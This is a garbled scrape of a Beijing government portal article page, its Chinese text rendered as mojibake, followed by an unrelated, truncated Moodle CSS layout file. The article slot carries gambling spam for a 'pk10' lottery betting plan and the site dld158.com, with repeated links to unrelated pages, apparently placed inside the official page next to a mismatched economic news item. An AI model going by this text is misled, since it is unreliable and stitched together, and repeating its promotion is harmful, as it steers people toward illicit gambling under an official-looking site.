|| temp==""){ alert("ÇëÊäÈëËÑË÷Ìõ¼þ"); } else{ var url="http://so.beijing.gov.cn/Query?qt="+encodeURIComponent(temp)+"&database="+encodeURIComponent(database); window.open(url); } return false; } </sCript> <form id="search" method="get" name="searchForm" action="" target="_blank" onSubmit="return checkForm()"> <input type="hidden" value="bj" id="database" name="database" /> <input name="temp" id="keyword" type="text" value="È«ÎÄËÑË÷" class="input" title="È«ÎÄËÑË÷¹Ø¼ü×Ö" /> <input id="searchbutton" type="image" src="http://www.beijing.gov.cn/images/zhuanti/xysym/search_btn.gif" width="66" height="35" title="µã»÷ËÑË÷" alt="ËÑË÷" /> </form> </div> <div class="version"><ul> <li><a title="ÎÞÕϰ­" href="http://wza.beijing.gov.cn/" target="_blank" id="yx_style_nav">ÎÞÕϰ­</a></li> <li><a target="_blank" title="·±Ìå°æ" href="http://210.75.193.158/gate/big5/www.beijing.gov.cn">·±Ìå</a></li> <li><a target="_blank" title="¼òÌå°æ" href="http://www.beijing.gov.cn">¼òÌå</a></li> <li class="last"><a target="_blank" title="English Version" href="http://www.ebeijing.gov.cn">English</a></li></ul><ul> <li><a href="javasCript:void(0)" onclick="SetHome(this,window.location)" title="ÉèΪÊ×Ò³">ÉèΪÊ×Ò³</a></li> <li><a title="¼ÓÈëÊÕ²Ø" href="javasCript:void(0)" onclick="shoucang(document.title,window.location)">¼ÓÈëÊÕ²Ø</a></li> <li class="last"><a target="_blank" title="ÒÆ¶¯°æ" href="http://www.beijing.gov.cn/sjbsy/">ÒÆ¶¯°æ</a></li></ul></div> </div> </div> <div class="nav-collapse"> <div class="container"> <ul class="nav"> <li ><a href="http://www.beijing.gov.cn/" class="normal" title="Ê×Ò³">Ê×Ò³</a></li> <li><a href="http://zhengwu.beijing.gov.cn/" class="normal" title="ÕþÎñÐÅÏ¢">ÕþÎñÐÅÏ¢</a></li> <li><a href="http://www.beijing.gov.cn/sqmy/default.htm" class="normal" title="ÉçÇéÃñÒâ">ÉçÇéÃñÒâ</a></li> <li><a href="http://banshi.beijing.gov.cn" class="normal" title="ÕþÎñ·þÎñ">ÕþÎñ·þÎñ</a></li> <li><a href="http://www.beijing.gov.cn/bmfw" class="normal" title="±ãÃñ·þÎñ">±ãÃñ·þÎñ</a></li> <li style="background:none;"><a href="http://www.beijing.gov.cn/rwbj/default.htm" class="normal" title="ÈËÎı±¾©">ÈËÎı±¾©</a></li> </ul> </div> </div><!--/.nav-collapse --> </div> </div> </div> <div class="container" style="background:#fff; margin-top:24px;"> <div class="content_text"> <div id="breadcrumbnav"> <ul> <li>Ê×Ò³¡¡>¡¡±ãÃñ·þÎñ¡¡>¡¡×îÐÂÌáʾ</li> </ul> <div class="clearboth"></div> </div> <h1>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <div id="othermessage"> <p> <span>À´Ô´£º±±¾©ÈÕ±¨</span> <span>ÈÕÆÚ£º2017-04-21 20:11:53</span></p> <dl> <sCript language='JavaScript' type="text/javasCript"> function changeSize(size){document.getElementById('div_zhengwen').style.fontSize=size+'px'}</sCript> ¡¾×ÖºÅ&nbsp;&nbsp;<a href='javasCript:changeSize(18)' style="font-size:16px;">´ó</a>&nbsp;&nbsp;<a href='javasCript:changeSize(14)' style="font-size:14px;">ÖÐ</a>&nbsp;&nbsp;<a href='javasCript:changeSize(12)' style="font-size:12px;">С</a>¡¿</dl> </div> </h1> <div id="div_zhengwen"> <div id="pic"> <ul id="pic_0"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_1"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_2"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_3"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_4"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_5"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_6"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_7"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_8"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_9"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> </div> <div class=TRS_Editor><p align="justify">¡¡¡¡±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® »¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨</p> <img src="{img}" width="300" height="330"/> <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/po/q5741517.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/po/q566500.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/po/q2671643.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/po/q0611511.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/po/q6671423.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡ <p>¡¡¡¡ÃÀ¹ú3ÔÂÏû·ÑÕßÐÅÐÄÖ¸Êý¾¢ÑïÖÁÓâÊ®ÁùÄê¸ß룬Óë´ËͬʱÀͶ¯Êг¡Òæ·¢ÀÖ¹Û;2ÔÂÉÌÆ·Ã³Ò×Äæ²î´ó·ùËõÕ­£¬±íÃ÷¾­¼ÃÔÚÄê³õµøµø×²×²ºóÖØ»ñ¶¯ÄÜ¡£ </p> <p>¡¡¡¡Öܶþ(3ÔÂ28ÈÕ)µÄÆäËûÊý¾ÝÏÔʾ£¬1Ô·¿¼Û½øÒ»²½ÉÏÉý£¬Í¹ÏÔÃÀ¹ú¾­¼Ã»ù±¾ÃæÇ¿¾¢¡£Ïû·ÑÕßÐÅÐÄÎȽ¡£¬ÒÔ¼°·¿¼ÛÉÏÑïËùÖµļÒÍ¥²Æ¸»Ôö³¤£¬°µÊ¾½üÆÚËð¼°Ôö³¤µÄÏû·ÑÕßÖ§³ö·Å»º»òΪ¶ÌÔÝÏÖÏó¡£ </p> <p>¡¡¡¡ÊÀ½ç´óÐÍÆóÒµÑо¿»á(Conference Board)¹«²¼£¬ÃÀ¹ú3ÔÂÏû·ÑÕßÐÅÐÄÖ¸ÊýÌøÉý9.5µãÖÁ125.6£¬Îª2000Äê12ÔÂÀ´×î¸ßˮƽ¡£3ÔÂÏû·ÑÕß¶Ôµ±Ç°ÆóÒµÓëÀͶ¯Êг¡Çé¿öµÄÆÀ¹À´ó·ù¸ÄÉÆ¡£ </p> <p>¡¡¡¡Ïû·ÑÕß»¹Ô¤ÆÚÊÕÈëÌá¸ß¡£µ÷²éÖÐËùνµÄ¾ÍÒµÊг¡²îÒìΪ2001ÄêÒÔÀ´×îÇ¿¡£¾ÍÒµÊг¡²îÒìÊÇÓÉÈÏΪÄÑÒÔÕÒµ½¹¤×÷µÄÊÜ·ÃÕß¼°ÈÏΪ¾ÍÒµ¸ÚλºÜ¶àµÄÊÜ·ÃÕßÁ½ÏîÊý¾Ý¼ÆËãµÃ³ö¡£ </p> <p>¡¡¡¡ÕâÏîÖ¸±êÓëÀ͹¤²¿¾ÍÒµ±¨¸æÖеÄʧҵÂÊÃÜÇÐÏà¹Ø¡£¸ÃÊý¾Ý·ûºÏ¾ÍÒµÊг¡ÏÐÖóÖÐøÏ½µ¼´½Ó½ü³ä·Ö¾ÍÒµµÄÇé¿ö¡£ </p> <p>¡¡¡¡ÃÀÔªÖ¸ÊýÉÏÑÃÀ¹ú¹«Õ®¼Û¸ñС·ùϵø¡£ÃÀ¹ÉÉÏÑÆäÖеÀÇí¹¤ÒµÖ¸Êý»ò½áÊø°ËÈÕÁ¬µø¡£ </p> <p>¡¡¡¡È¥Äê11ÔÂÌØÀÊÆÕÓ®µÃ´óÑ¡ºó£¬Ïû·ÑÕßºÍÆóÒµÐÅÐľùÉÏÕÇ¡£ÌØÀÊÆÕÕþ¸®³ÐÅµÍÆÐÐÓÐÀûÆóÒµµÄÕþ²ß£¬°üÀ¨¼õ˰ºÍ·Å¿í¼à¹Ü¡£ </p> <p>¡¡¡¡Ò½±£Á¢·¨´³¹ØÊ§°Ü£¬ÔÚÊг¡Òý·¢Á˶ÔÌØÀÊÆÕʵʩ˰¸ÄµÈÆäËûÕþ²ß¿ÉÄÜÃæÁÙÀ§Äѵĵ£ÓÇ¡£ </p> <p>¡¡¡¡¾­¼Ãѧ¼ÒÔ¤²âÐÅÐĽ«ÔÚ4Ô»ØÂ䣬µ«ËûÃDZíʾ¼ÒÍ¥µÄÀÖ¹ÛÇéÐ÷ÊÇÊܾÍÒµÊг¡µÄÁ¼ºÃ×´¿öÇý¶¯£¬¶ø·ÇÌØÀÊÆÕµÄ³Ðŵ¡£ËûÃÇÖ¸³ö£¬¾ÍÒµÊг¡¼áͦ¿ÉÄÜ»á¹ÄÀøÃÀÁª´¢ÔÚ6ÔÂÔٴμÓÏ¢¡£ </p> <p>¡¡¡¡Å£»ã </p> <p>¡¡¡¡2017-3-29 </p> </p></div> <div id="filerider"> <div class="filelink" style="margin:10px 0 0 0;"><a href="./P020160207382291268334.doc">¸½¼þ£º2016Äê±±¾©µØÇø²©Îï¹Ý´º½ÚϵÁлһÀÀ±í</a></div> </div> </div> <div id="essaybottom" style="border:0; overflow:hidden; margin-bottom:0;"> <div style="padding-bottom:8px;" id="proclaim"><p style="float:left; line-height:30px;">·ÖÏíµ½£º</p><div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_qzone" data-cmd="qzone"></a><a href="#" class="bds_tsina" data-cmd="tsina"></a><a href="#" class="bds_tqq" data-cmd="tqq"></a><a href="#" class="bds_renren" data-cmd="renren"></a><a href="#" class="bds_weixin" data-cmd="weixin"></a></div> <sCript>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdPic":"","bdStyle":"0","bdSize":"16"},"share":{},"image":{"viewList":["qzone","tsina","tqq","renren","weixin"],"viewText":"·ÖÏíµ½£º","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('sCript')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</sCript></div> </div> <div id="essaybottom" style="margin-top:0;"> <div style="padding-bottom:8px;" id="proclaim">תժÉùÃ÷£º×ªÕªÇë×¢Ã÷³ö´¦²¢×ö»ØÁ´</div> </div> </div> </div> <!-- /container --> <div id="footer"> <div class="container"> <div class="span1" style="text-align:center"><sCript type="text/javasCript">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CsCript src='http://dcs.conac.cn/js/01/000/0000/60429971/CA010000000604299710004.js' type='text/javasCript'%3E%3C/sCript%3E"));</sCript></div> <div class="span8"> <div class="footer-top"> <div class="footer-class"> <p> <a title="¹ØÓÚÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306339.htm" style=" background:0">¹ØÓÚÎÒÃÇ</a><a target="_blank" title="Õ¾µãµØÍ¼" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306342.htm">Õ¾µãµØÍ¼</a><a target="_blank" title="ÁªÏµÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306343.htm">ÁªÏµÎÒÃÇ</a><a target="_blank" title="ÆÀ¼ÛÊ×¶¼Ö®´°" href="mailto:service@beijing.gov.cn">ÆÀ¼ÛÊ×¶¼Ö®´°</a><a target="_blank" title="·¨ÂÉÉùÃ÷" href="http://www.beijing.gov.cn/zdxx/t709204.htm">·¨ÂÉÉùÃ÷</a> </p> <p>Ö÷°ì£º±±¾©ÊÐÈËÃñÕþ¸® °æÈ¨ËùÓга죺±±¾©Êо­¼ÃºÍÐÅÏ¢»¯Î¯Ô±»á ¾©ICP±¸05060933ºÅ ÔËÐйÜÀí£ºÊ×¶¼Ö®´°ÔËÐйÜÀíÖÐÐÄ</p> <p>¾©¹«Íø°²±¸ 110105000722 µØÖ·£º±±¾©Êг¯ÑôÇø±±³½Î÷·Êý×Ö±±¾©´óÏÃÄϰ˲㠴«Õ棺84371700 ¿Í·þÖÐÐĵ绰£º59321109</p> </div> </div> </div> </div> </div> <div style="display:none"> <sCript type="text/javasCript">document.write(unescape("%3CsCript src='http://yhfx.beijing.gov.cn/webdig.js?z=12' type='text/javasCript'%3E%3C/sCript%3E"));</sCript> <sCript type="text/javasCript">wd_paramtracker("_wdxid=000000000000000000000000000000000000000000")</sCript> </div> <sCript src="http://static.gridsumdissector.com/js/Clients/GWD-800003-C99186/gs.js" language="JavaScript"></sCript> <sCript type="text/javasCript"> // ÉèÖÃΪÖ÷Ò³ function SetHome(obj,vrl){ try{ obj.style.behavior='url(#default#homepage)';obj.setHomePage(vrl); } catch(e){ if(window.netscape) { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) { alert("´Ë²Ù×÷±»ä¯ÀÀÆ÷¾Ü¾ø£¡\nÇëÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë¡°about:config¡±²¢»Ø³µ\nÈ»ºó½« [signed.applets.codebase_principal_support]µÄÖµÉèÖÃΪ'true',Ë«»÷¼´¿É¡£"); } var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch); prefs.setCharPref('browser.startup.homepage',vrl); }else{ alert("ÄúµÄä¯ÀÀÆ÷²»Ö§³Ö£¬Çë°´ÕÕÏÂÃæ²½Öè²Ù×÷£º1.´ò¿ªä¯ÀÀÆ÷ÉèÖá£2.µã»÷ÉèÖÃÍøÒ³¡£3.ÊäÈ룺"+vrl+"µã»÷È·¶¨¡£"); } } } // ¼ÓÈëÊÕ²Ø ¼æÈÝ360ºÍIE6 function shoucang(sTitle,sURL) { try { window.external.addFavorite(sURL, sTitle); } catch (e) { try { window.sidebar.addPanel(sTitle, sURL, ""); } catch (e) { alert("¼ÓÈëÊÕ²ØÊ§°Ü£¬ÇëʹÓÃCtrl+D½øÐÐÌí¼Ó"); } } } </sCript> <!-- Le javasCript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <sCript src="/images/zhuanti/xysym/jquery.js"></sCript> <sCript src="/images/zhuanti/xysym/bootstrap-collapse.js"></sCript> <sCript> $(document).ready(function(){ $(".ui-select").selectWidget({ change : function (changes) { return changes; }, effect : "slide", keyControl : true, speed : 200, scrollHeight : 250 }); }); </sCript> </body> </html>
theme/standard/styles_layout.css
ajv/Offline-Caching
/******************************************************************* styles_layout.css This CSS file contains all layout definitions like positioning, floats, margins, padding, borders etc. Styles are organised into the following sections: core forms header footer admin blocks blog calendar course doc grades login message notes mymoodle question tabs tags user various modules *******************************************************************/ /*** *** Core ***/ h1.main, h2.main, h3.main, h4.main, h5.main, h6.main { text-align: center; } #layout-table { width:100%; border-collapse:separate; margin-top: 8px; } #layout-table #region-side-pre, #layout-table #content, #layout-table #region-side-post { vertical-align:top; } #layout-table #content { padding-left:12px; padding-right:12px; } .clearer { clear:both; margin:0; padding:0; height:1px; border:none; background:transparent; display:block; } .clearfix { min-width: 0; /* overflow: hidden; */ } .clearfix:after { /* content: "<!-- -->"; */ content: "."; display: block; height: 0; clear: both; visibility: hidden; } #redirect { text-align: center; margin-top:10%; } /* .clearfix {display: inline-table;} */ /* Hides from IE-mac \*/ * html .clearfix {height: 1%;} .clearfix {display: block;} /* End hide from IE-mac */ .mdl-align { text-align: center; } .mdl-left { text-align: left; } .mdl-right { text-align: right; } .continuebutton { text-align: center; } form { margin-bottom:0; } table { border-spacing: 0; border-collapse: collapse; } a img { border:none; } img.userpicture, img.grouppicture { border: 0; } img.uihint { cursor: help; } #grouppicture { text-align: center; } div.groupselector { float: left; margin-top: 3px; margin-bottom: 3px; } #addmembersform table { margin-left: auto; margin-right: auto; } .notifyproblem { text-align: center; padding: 10px; } .notifysuccess { text-align:center; padding: 10px; } .notifytiny { text-align:left; padding: 0; } .singlebutton form, .singlebutton div { display:inline; } .box { clear: both; } .generalbox { border-width:1px; border-style:solid; margin-bottom: 15px; padding:10px; } .generalbox#intro { width:70%; margin-left:auto; margin-right:auto; padding-bottom:15px; } .boxaligncenter { margin-left:auto; margin-right:auto; } .boxalignright { margin-left:auto; margin-right:0; } .boxalignleft { margin-left:0; margin-right:auto; } .boxwidthnarrow { width: 30% } .boxwidthnormal { width: 50% } .boxwidthwide { width: 80% } .centerpara { text-align:center } .collapsibleregion { overflow: hidden; padding: 1px; } .collapsibleregioncaption { white-space: nowrap; } .collapsibleregioncaption img { vertical-align: middle; } div.collapsibleregion div.collapsibleregioncaption a { color: inherit; text-decoration: none; } .jsenabled .collapsed .collapsibleregioninner { visibility: hidden; } .noticebox { border-width:1px; border-style:solid; padding:10px; } #notice.generalbox { width: 60%; margin-left:auto; margin-right:auto; } #notice .buttons { text-align:center } #notice .buttons div, #notice .buttons form { display:inline; } #notice .singlebutton { text-align:center; padding: 5px; margin: 0px; } .errorbox { border-width:1px; border-style:solid; margin: 1em 15%; width: 70%; padding:10px; } .errorbox .title { padding: 5px; } .informationbox { border-width:1px; border-style:solid; padding: 10px; } .feedbackbox { border-width:1px; border-style:solid; } .feedbackby { } .feedback { } .rsslink { padding: 0 0 0 0.3em; } .printicon { padding: 0 0 0 0.3em; } .generaltable { border-width: 1px; border-style: solid; } .generaltable .cell { border-width: 1px; border-style: solid; border-collapse: collapse; } .generaltable th.header { vertical-align: top; } table.rotateheaders th.header { vertical-align: bottom; } #participationreport .reporttable { text-align: center; margin-left:auto; margin-right:auto; } #participationreport { text-align: center; } #participationreport .modulename { font-weight: bold; } #participationreportselector { text-align: center; } #participationreportactions { text-align: center; } .initialbar { text-align: center; } #help .indent { margin-left:3em; } .closewindow, #help .helpindex { text-align: center; } .tabledivider { border-width:1px; border-style:solid; border-left:0; border-right:0; border-top:0; } .sitetopic { margin-bottom:20px; } .sitetopiccontent { border-width:1px; border-style:solid; } .pagingbar { text-align:center; } .pagingbar a { padding-left: 10px; } .pagingbar .thispage { padding-left: 10px; } table.formtable { margin: auto; } table.formtable tbody th { vertical-align: top; } table.formtable tbody td, table.formtable tbody th { padding: 5px; } table.formtable tbody .htmlarea td, table.formtable tbody .htmlarea th { padding: 0; } .flexible th { white-space: nowrap; } .paging { text-align: center; margin: 10px 0 10px 0; } .unread { padding-right:2px; } .cell { vertical-align: top; } .heading-with-help { text-align:center; margin:0.83em 0; } .heading-with-help h2 { margin:0; display:inline; } .helplink img { vertical-align: middle; margin: 0 2px; width: 17px; height: 17px; } img.emoticon { vertical-align: middle; width: 15px; height: 15px; } form.popupform, form.popupform div { display: inline; } form.popupform label { margin-right: 0.5em; } .arrow_button { margin-top:3em; } .arrow_button input { padding:0.3em; overflow:hidden; } .groupmanagementtable { width: 90%; } .groupmanagementtable td { vertical-align: middle; } .groupmanagementtable p { text-align: left; margin-bottom: 0.2em; } .groupmanagementtable #existingcell, .groupmanagementtable #potentialcell { width: 42%; } .groupmanagementtable #existingcell label, .groupmanagementtable #potentialcell label { font-weight: bold; } .groupmanagementtable #buttonscell { width: 16%; } .groupmanagementtable #buttonscell p { text-align: center; } .groupmanagementtable #buttonscell input { width: 80%; padding: 1em 0; } .groupmanagementtable #buttonscell #remove { margin: 7em 0; } .groupmanagementtable #backcell { padding-top: 2em; text-align: center; } .groupmanagementtable #removeselect_wrapper, .groupmanagementtable #addselect_wrapper { width: 100%; } .groupmanagementtable #removeselect_wrapper label, .groupmanagementtable #addselect_wrapper label { font-weight: normal; } #group-groupings .buttons { margin: 20px; text-align:center; } #group-groupings .buttons .singlebutton { display: inline; padding: 5px; } #group-usersummary { width: 14em; } img.icon { vertical-align:middle; /*margin-right:4px;*/ width:16px; height:16px; border:0px; } img.iconsmall { vertical-align:middle; margin-right:1px; width:11px; height:11px; border:0px; } img.iconhelp { vertical-align:middle; margin-right:4px; width:17px; height:17px; border:0px; } img.iconkbhelp { width:49px; height:17px; border:0px; } img.icontoggle { width:50px; height:17px; border:0px; vertical-align:middle; } /*Accessibility: text 'seen' by screen readers but not visual users. Fixed for RTL languages, example Farsi. */ .accesshide { position:absolute; top:-100000px; left:10px; font-weight:normal; font-size:1em; } .invisiblefieldset { display:inline; border:0px; padding:0px; margin:0px; } span.hide, div.hide { display:none; } .userselector select { width: 100%; } .userselector div { margin-top: 0.2em; } .userselector div label { margin-right: 0.3em; } #userselector_options { font-size: 0.75em; } #userselector_options .collapsibleregioncaption { font-weight: bold; } #userselector_options p { margin:0.2em 0pt; text-align:left; } #help_icon_tooltip { font-size: 0.7em; } #help_icon_tooltip h1 { font-size: 1.1em; font-weight: bold; } #help_icon_tooltip div.bd { width: 35em; } #help_icon_tooltip .readmore { display: block; font-style: italic; margin-top:10px; } /*** *** Forms ***/ .mform { margin: 0 auto; padding: 0; width: 80%; } .mform fieldset { border: 1px solid #DDDDDD; padding: 10px 0; margin: 0.7em 0; width:100%; } .mform fieldset.hidden, .mform fieldset.felement { border: 0; } .mform fieldset.felement { width: auto; } .mform ul.file-list{ padding:0; margin:0; list-style:none; } .mform fieldset legend { font-weight: bold; margin-left: 0.5em; } .advancedbutton { width:100%; text-align:right; } .jsenabled .advancedbutton .showadvancedbtn { display:none; } .mform div.fitem { clear: both; width: 100%; min-height: 1.5em; } .mform .fitemtitle { display: block; float: left; width: 30%; padding: 0; margin: 5px 0 0 10px; text-align: right; } .mform .fitemtitle div{ display: inline; } div.fitem fieldset.fgroup label, div.fradio label, div.fcheckbox label, fieldset.fdate_selector label { display:inline; float: none; width: auto; } #date_selector_calendar_panel .bd { padding: 0; } #date_selector_calendar_panel .yui-calcontainer { border: none; float: none; } /* Prevent border-collapse:collapse from bleeding through in IE6, IE7 */ #date_selector_calendar_panel.yui-overlay-hidden table { *display:none; } #date_selector_calendar_panel th.calhead { padding-right: 2em; } #date_selector_calendar_panel a.container-close { top: 10px; } .mform div.felement, .mform fieldset.felement{ display: block; float: left; margin: 5px 0 0 10px; padding: 0; text-align:left; width: 60%; } .mform div.fdescription { clear: both; min-height: 1.5em; } .mform .fdescription.required { text-align:right; } .mform input, .mform select { width: auto; } .mform .ftextarea #id_alltext { width: 100%; } .mform br { clear: left; } .mform div.fhtmleditor { margin: 5px 0 0 10px; padding: 0; float: left; display: block; } .mform span.error, .mform span.required { color: red; float: right; margin-right: 0.3em; } .mform div.error,.mform fieldset.error { border: 1px solid red; color: inherit; } .mform .fcheckbox input { margin-left: 0px; } .mform .fpassword .unmask { display:inline; } .mform .fpassword .unmask input { margin-left:5px; margin-right:3px; } .mform label .req, .mform label .adv { cursor: help; } .mform .ftags label.accesshide { display: block; position: static; } .mform .ftags select { margin-bottom: 0.7em; min-width: 22em; } /* form frozen */ div.mform div.fitem div.fstatic{ border-color : #D3D3D3; border-style : dashed; border-width : thin; } #admin-register .mform .fsubmit { padding:20px; text-align:center; } div.phpinfo .center{ text-align: center; } div.phpinfo .center table { margin-left: auto; margin-right: auto; text-align: left; } div.phpinfo .center th { text-align: center; } .backup-form-instances { margin:0px 20px 0px 20px; } .restore-form-instances { margin:0px 20px 0px 20px; } #portfolio-add-button { display:inline; } /*** *** Header ***/ #header-home { } #header { } .headermain, h1.headermain { float:left; margin:0; padding:0; } .headermenu { float:right; text-align:right; } .navigation li, .navigation div, .navigation button, .navigation form { display: inline; } .navbar { width:auto; padding:3px 0.5em; border-width:1px; border-style:solid; } .navbar .langmenu { text-align:right; } table.navbar { width: 100%; } .navbar .navbutton { margin-top: 3px; float: left; } .navbar .navbutton div, .navbar .navbutton form { display:inline; margin:0px; padding:0px; } .navbar .breadcrumb { float:left; margin:0.2em 0; } .breadcrumb ul { padding:0; margin:0; text-indent:0; list-style:none; } .breadcrumb li { display:inline; } .navbar .navbutton, .navbar .menu { float:right; } #footer .navbar { margin-top: 4em; } .reportlink { text-align:right; } .navigation { margin-bottom: 4px; } .navigation ul { margin:0px; padding:0px; list-style-type:none; } .navigation ul li form, .navigation ul li { display:inline; margin:0px; padding:0px; margin-left:2px; } .navigation ul li form fieldset, .navigation ul li form div select { vertical-align: middle; } .navigation optgroup { text-align:center; padding-top:4px; } .navigation option { text-align:left; } .navigation optgroup option { padding:0px; } #navmenupopup option, #navmenufooterpopup option { padding: 2px 0 2px 20px; background-repeat: no-repeat; background-position: 1px 2px; vertical-align: middle; } /*** *** Footer ***/ #footer { text-align:center; margin-top: 40px; } .homelink { margin: 1em 0; } .homelink a { padding-left:1em; padding-right:1em; } .sitelink { padding-top:1em; } .performanceinfo { margin: 2em; } .performanceinfo span { display: block; } #footer .validators { margin-top:40px; padding-top:5px; border-top: 1px dotted gray; } #footer .validators ul { margin:0px; padding:0px; list-style-type:none; } #footer .validators ul li { display:inline; margin-right:10px; margin-left:10px; } /*** *** Filters ***/ .mediaplugin { display:block; clear:both; margin-top:5px; margin-bottom:5px; } .mediaplugin_mp3, .mediaplugin_swf, .mediaplugin_flv { display:inline; clear:none; margin:0px; margin-left:0.5em; } .texrender { border:0px; vertical-align:middle; } /*** *** Admin ***/ body#admin-index .c0 { vertical-align: top; } body#admin-index .c1 { vertical-align: middle; } body#admin-blocks table.generaltable th, body#admin-filters table.generaltable th, body#admin-modules table.generaltable th, body#admin-auth table.generaltable th { white-space: nowrap; } body#admin-modules .generaltablecell { padding-top: 2px; padding-bottom: 2px; } body#admin-blocks table.generaltable th, body#admin-blocks table.generaltable td.cell, body#admin-filters table.generaltable th, body#admin-filters table.generaltable td.cell, body#admin-modules table.generaltable th, body#admin-modules table.generaltable td.cell, body#admin-auth table.generaltable th, body#admin-auth table.generaltable td.cell { padding: 4px; text-align: center; vertical-align: middle; } body#admin-blocks table.generaltable th.c0, body#admin-blocks table.generaltable td.c0, body#admin-filters table.generaltable th.c0, body#admin-filters table.generaltable td.c0, body#admin-modules table.generaltable th.c0, body#admin-modules table.generaltable td.c0, body#admin-auth table.generaltable th.c0, body#admin-auth table.generaltable td.c0 { text-align: left; } body#admin-modules table.generaltable td.c0 { white-space: nowrap; } #admin-blocks #admin-config .confighelp { display: block; padding-bottom: 20px; } #admin-stickyblocks .generalbox { text-align:center; } #admin-index .copyrightnotice { margin: auto; text-align: center; } #admin-maintenance .buttons { text-align:center; } #admin-report-unittest-index .exception pre { padding: 8px; } #admin-report-unittest-index .unittestsummary { padding: 8px; margin-top: 1em; } #admin-report-security-index #timewarning { text-align:center; } #admin-report-security-index .timewarninghidden { display:none; } #admin-report-capability-index .rolecaps th { text-align: left; } #admin-report-capability-index #settingsform { text-align: left; } #admin-report-capability-index #settingsform h2 { margin-top: 0; } #admin-report-capability-index #settingsform p { margin-bottom: 0; } #admin-report-capability-index #settingsform #menucapability, #admin-report-capability-index #settingsform #capabilitysearchui { width: 100%; } #admin-report-capability-index #settingsform #capabilitysearch { width: 30em; } #admin-report-capability-index h3 { margin-bottom: 0; } #admin-report-questioninstances-index #settingsform h2 { margin-top: 0; } #admin-report-questioninstances-index #settingsform p { margin-bottom: 0; } #admin-report-questioninstances-index #settingsform p { margin-bottom: 0; } #admin-qtypes th { white-space: normal; } #admin-qtypes .cell.c3 { font-size: 0.7em; } #admin-qtypes .cell { text-align: center; } #admin-qtypes .cell.c0 { text-align: left; } #admin-qtypes #qtypes div, #admin-qtypes #qtypes form { display: inline; } #admin-qtypes #qtypes img.spacer { width: 16px; } #filter-manage .buttons, #admin-roles-allow .buttons, #admin-roles-manage .buttons, #admin-roles-define .buttons, #admin-roles-override .buttons { margin: 20px; text-align:center; } #admin-roles-manage .buttons .singlebutton, #admin-roles-define .buttons .singlebutton, #admin-roles-override .buttons .singlebutton { display: inline; padding: 5px; } #admin-roles-define .topfields { margin: 1em 0 2em; } .roleassigntable { width: 100%; } .roleassigntable td { vertical-align: top; padding: 0.2em 0.3em } .roleassigntable p { text-align: left; margin: 0.2em 0; } .roleassigntable #existingcell, .roleassigntable #potentialcell { width: 42%; } .roleassigntable #existingcell label, .roleassigntable #potentialcell label { font-weight: bold; } .roleassigntable #buttonscell { width: 16%; } .roleassigntable #buttonscell #add, .roleassigntable #buttonscell #remove { width: 100%; margin: 0.3em 0; padding: 0.5em 0; } .roleassigntable #buttonscell p { margin: 0.3em 0; } .roleassigntable #buttonscell #assignoptions { font-size: 0.75em; } .roleassigntable #buttonscell #assignoptions .collapsibleregioncaption { font-weight: bold; } .roleassigntable #buttonscell #addcontrols { margin-top: 3em; height: 13em; } .roleassigntable #removeselect_wrapper, .roleassigntable #addselect_wrapper { width: 100%; } .roleassigntable #removeselect_wrapper label, .roleassigntable #addselect_wrapper label { font-weight: normal; } #admin-roles-define .mform { width: 100%; } #filter-manage .backlink, #admin-roles-manage .backlink, #admin-roles-define .backlink, #admin-roles-explain .backlink, #admin-roles-assign .backlink, #admin-roles-override .backlink { text-align: right; width: 90%; margin: 2em auto 1em; } #admin-roles-explain #chooseuser h3 